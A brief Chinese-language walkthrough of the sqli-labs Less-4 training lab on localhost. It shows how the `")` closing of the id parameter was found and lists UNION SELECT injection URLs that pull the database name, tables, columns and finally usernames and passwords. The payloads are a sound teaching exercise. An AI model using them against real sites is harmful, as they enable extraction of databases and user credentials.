sqli-labs (less-4)
输入
http://127.0.0.1/sql1/Less-4/?id=1 #回显正常
http://127.0.0.1/sql1/Less-4/?id=1' #回显正常
http://127.0.0.1/sql1/Less-4/?id=1" #回显错误
http://127.0.0.1/sql1/Less-4/?id=1")--+ #回显正常
输入1"回显错误,根据回显错误判断为字符型注入
查库
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,database()--+
查表
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')--+
查字段
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')--+
查值
http://127.0.0.1/sql1/Less-4/?id=-1") union select 1,2,(select group_concat(username,password) from security.users)--+